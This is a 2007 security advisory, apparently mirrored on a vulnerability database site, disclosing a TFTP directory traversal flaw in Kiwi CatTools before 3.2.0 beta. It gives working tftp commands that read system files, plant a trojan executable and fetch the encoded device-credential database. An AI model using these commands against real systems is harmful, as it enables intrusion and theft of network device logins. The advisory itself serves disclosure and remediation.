Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16012
HistoryFeb 09, 2007 - 12:00 a.m.

TFTP directory traversal in Kiwi CatTools

2007-02-0900:00:00
vulners.com
22
JSON
    TFTP directory traversal in Kiwi CatTools

Application : Kiwi CatTools prior to 3.2.0 beta
Release Date : 8 February 2007
Author : Nicob <nicob at nicob.net>

Product :

http://www.kiwisyslog.com/cattools-info.php :

"Kiwi CatTools is a freeware application that provides automated device
configuration management on routers, switches and firewalls."

A built-in TFTP server exists and a "encrypted device database" contains
IP addresses, logins and passwords for each configured device.

Vunerability :

TFTP directory traversal :

tftp -i 10.11.12.13 GET a//…//…//…//…//…//boot.ini
tftp -i 10.11.12.13 PUT foo.exe a//…//trojan.exe

Note : the device database is only protected by a reversible encoding
and can be remotely accessed with "GET a//…//…//kiwidb-cattools.kdb".

Solution :

Upgrade to version 3.2.0 beta or newer.

Nicob

JSON